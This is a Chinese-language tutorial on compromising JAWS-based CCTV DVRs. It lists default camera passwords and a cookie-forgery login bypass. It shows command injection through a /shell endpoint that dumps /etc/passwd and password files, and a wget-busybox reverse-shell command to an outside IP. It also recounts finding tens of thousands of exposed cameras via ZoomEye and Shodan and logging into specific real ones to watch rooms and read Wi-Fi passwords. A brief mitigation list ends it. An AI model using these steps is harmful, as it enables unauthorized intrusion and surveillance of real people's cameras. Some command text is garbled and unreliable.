使用Zoomeye***網絡攝像頭

使用Zoomeye***網絡攝像頭

simeon

    網絡攝像頭（IP CAMERAS）在平常生活中愈來愈普及，交通路口抓取車牌號碼，幼兒園用來監控小孩，小區車牌識別系統等等，這些攝像頭會跟計算機或者錄像等硬件設備鏈接，以便進行圖像存儲和及時瀏覽。不少攝像頭還直接跟網絡鏈接，以方便客戶經過瀏覽器或者客戶端進行鏈接管理和查看。商家的本意是爲了方便用戶進行查看，但不少網絡攝像頭因爲廠商對安全重視不夠，***經過技術手段能夠很方便對存在漏洞的網絡攝像頭進行存取和瀏覽，在有些狀況下，還能夠獲取網絡攝像頭所在服務器的權限，甚至能夠***進入該攝像頭所在網絡，危害實在很大。

1、存在漏洞分析

   AndrewTierney在其Blog上公佈了一片有關攝像頭漏洞利用的文章（https://www.pentestpartners.com/blog/pwning-cctv-cameras/）。概括其核心以下：

   1.存在弱口令漏洞

   簡稱爲「CCTV」（Mvpower 8 Channel Security DVR Full D1 H.264CCTV Real-time Network Digital Video Recorder Mobile Motion Detection,P2P HDMIAlarm Email for CCTV Surveillance Cmeras System）amazon購買地址http://www.amazon.co.uk/dp/B0162AQCO4，存在弱口令admin密碼爲空。收集的其它幾款網絡攝像機的口令以下：

 （1）海康威視IP網絡攝像機：超級用戶：admin，超級用戶密碼：12345。

 （2）大華網絡攝像機：用戶名：admin，密碼：888888。

 （3）天地偉業網絡攝像機：用戶名：Admin，密碼：111111

2.登陸密碼繞過漏洞

   咱們能夠對以前用默認密碼成功登陸的頁面進行抓包，找處處理頁面登陸邏輯的js，對處理頁面登陸的邏輯分析發現，存在登陸繞過漏洞，代碼以下：

$(document).ready(function(){

         dvr_camcnt= Cookies.get("dvr_camcnt");

         iSetAble= Cookies.get("iSetAble");

         iPlayBack= Cookies.get("iPlayBack");

         dvr_usr= Cookies.get("dvr_usr");

         dvr_pwd= Cookies.get("dvr_pwd");

         if(iSetAble== '0'){

                 $('#pb_settings').css('display','none');

                 }

         if(iPlayBack== '0'){

                 $('#pb_review').css('display','none');

                 }

         if(dvr_camcnt== null || dvr_usr == null || dvr_pwd == null)

         {

                 location.href= "/index.html";

         }

   系統管理頁面直接經過js檢查cookie是否爲空來判斷用戶是否登陸。如今居然還有程序員這樣來寫登陸狀態判斷。

   因而，經過僞造cookie即可以繞過登陸檢查。經過代碼能夠看到須要僞造三個cookie值，dvr_camcnt，dvr_usr=admin，dvr_pwd=123。直接打開http://xx.xx.xx.xx/view2.html時，抓包發現系統會自動設置該cookie參數的值，這個值須要記錄下來，不然後面填錯的話是看不到監控內容的。dvr_usr和dvr_pwd能夠隨便設置，只要不爲空就好，如圖1所示。保存後，從新刷新一下http://xx.xx.xx.xx/view2.html，即可以成功登陸系統。

圖1密碼繞過漏洞

3.直接獲取webshell及其root密碼

   直接訪問http://www.antian365.com/shell?cat /etc/passwd便可獲取服務器root賬號密碼，如圖2所示。獲取其root賬號密碼爲a03e3thxwWU0g，經破解其明文爲「juantech」。

圖2獲取webshell

4.獲取反彈shell

  執行如下命令：

  cd/root/rec/a1 && wget http://212.111.43.161/busybox &&chmod +xbusybox&& ./busybox  nc 122.115.47.398000 -e /bin/sh -e /bin/sh，將反彈shell至122.115.47.39的8000端口。還能夠執行命令「http://www.antian365.com/shell?/usr/sbin/telnetd-l/bin/sh -p 25」經過telnet 目標IP直接進入系統。

2、實戰演練

   經過上面的漏洞分析，咱們能夠對存在漏洞的CCTV網絡攝像頭進行實際漏洞測試，以驗證漏洞的真實性和掌握漏洞利用方法。

   1.肯定cctv網絡攝像頭關鍵字「JAWS」

  在kaliLinux中打開bannergrab，填上設備的IP地址和web端口號，banner抓取結果如圖3所示，其中關鍵字爲Server後的字符串「JAWS」。

圖3獲取關鍵字

2.快速獲取存在的目標服務器

   在本例中使用zoomeye進行檢索，輸入地址https://www.zoomeye.org/search?q=JAWS 直接進行查詢，也可使用shodan進行檢索（https://www.shodan.io/search?query=JAWS%2F1.0），如圖4所示，獲取了找到約37,726 條結果, 34,263 個主機 (0.096 秒)。

圖4檢索關鍵字「JAWS」

3.隨機對目標進行訪問

   在檢索結果中隨機對結果進行訪問，打開http://223.255.146.74/，用戶名輸入admin密碼爲空，直接登陸系統，如圖5所示，能夠查看監控的房間和畫面。

圖5獲取訪問權限

4.直接獲取訪問密碼

  使用命令「shell?cat%20/tmp/usrm.ini」能夠直接獲取訪問密碼，例如http://210.21.34.206/shell?cat%20/tmp/usrm.ini能夠獲取默認管理員密碼爲空，如圖6和圖7所示。將默認密碼進行修改後，從新訪問，其密碼已經寫入到/tmp/usrm.ini文件中。

圖6直接獲取管理員密碼

圖7修改後的密碼直接明文保存

   5.獲取無線網絡密碼

   在其網絡設置中能夠直接獲取其無線AP的名稱及其密碼，如圖8所示。

   6.反彈shell測試

   對部分目標進行了反彈shell測試，均爲成功，多是無寫權限，下載http://212.111.43.161/busybox文件大概須要100M。

3、防範措施及建議

  目前網上已經出現利用該漏洞惡意程序，而官方未發佈相應補丁。用戶可採起如下措施加固安全：

1.修改默認root密碼爲其餘強健密碼。

2.對外不提供web訪問。或者將地址設置爲一個複雜的名稱，使其默認地址不被訪問。

3.對服務器可寫進行嚴格限制。

4.修改默認admin密碼。

參考文章：

1.http://www.freebuf.com/tools/5950.html

2.http://www.ijiandao.com/safe/cto/5450.html

3.http://www.myhack58.com/Article/html/3/8/2015/64210.htm

4.http://hb.ifeng.com/3c/detail_2014_04/04/2083399_0.shtml

5.http://security.zol.com.cn/443/4439365_all.html

6.http://bobao.360.cn/news/detail/1388.html

7.http://www.myhack58.com/Article/html/2/5/2015/58087.htm

8.http://drops.wooyun.org/category/papers